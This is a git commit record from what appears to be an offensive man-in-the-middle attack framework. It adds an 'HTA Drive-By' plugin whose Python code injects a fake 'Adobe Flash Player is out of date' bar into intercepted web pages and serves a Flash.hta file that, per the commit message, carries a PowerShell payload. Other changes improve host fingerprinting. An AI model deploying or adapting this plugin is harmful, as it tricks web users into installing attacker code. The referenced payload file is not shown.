This is a vewwwy big commit

- The inject plugin now uses beautifulsoup4 to actually parse HTML and add content to it as supposed to using regexes - The logging of the whole framework has been compleatly overhauled - plugindetect.js now includes os.js from the metasploit framework for os and browser detection, let's us fingerprint hosts even if UA is lying! - New plugin HTA Drive-by has been added, prompts the user for a plugin update and makes them download an hta app which contains a powershell payload - the API of the plugins has been simplified - Improvements and error handling to user-agent parsing - Some misc bugfixes
2025-07-06 13:02:24 -07:00 · 2015-07-18 20:14:07 +02:00 · 2015-07-18 20:14:07 +02:00 · 5e2f30fb89
commit 5e2f30fb89
parent ff0ada2a39
64 changed files with 3748 additions and 1473 deletions
--- a/plugins/htadriveby.py
+++ b/plugins/htadriveby.py
@ -0,0 +1,56 @@
+# Copyright (c) 2014-2016 Marcello Salvati
+#
+# This program is free software; you can redistribute it and/or
+# modify it under the terms of the GNU General Public License as
+# published by the Free Software Foundation; either version 3 of the
+# License, or (at your option) any later version.
+#
+# This program is distributed in the hope that it will be useful, but
+# WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+# General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
+# USA
+#
+
+import re
+import flask
+
+from plugins.plugin import Plugin
+from plugins.inject import Inject
+from core.servers.http.HTTPserver import HTTPserver
+
+class HTADriveBy(Inject, Plugin):
+	name = 'HTA Drive-By'
+	desc = 'Performs HTA drive-by attacks on clients'
+	optname = 'hta'
+	ver = '0.1'
+
+	def initialize(self, options):
+		self.bar_text = options.text
+		self.ip = options.ip
+		Inject.initialize(self, options)
+		self.html_payload = self.get_payload()
+
+		server = HTTPserver().server
+
+		@server.route('/<hta_req>')
+		def client_request(hta_req):
+			if hta_req == "Flash.hta":
+				with open('./config/hta_driveby/Flash.hta') as hta_file:
+					resp = flask.Response(hta_file.read())
+
+				resp.headers['Content-Type'] = "application/hta"
+				return resp
+
+	def get_payload(self):
+		with open("./core/html/htadriveby.html", 'r') as file:
+			payload = re.sub("_TEXT_GOES_HERE_", self.bar_text, file.read())
+			payload = re.sub("_IP_GOES_HERE_", self.ip, payload)
+		return payload
+
+	def options(self, options):
+		options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")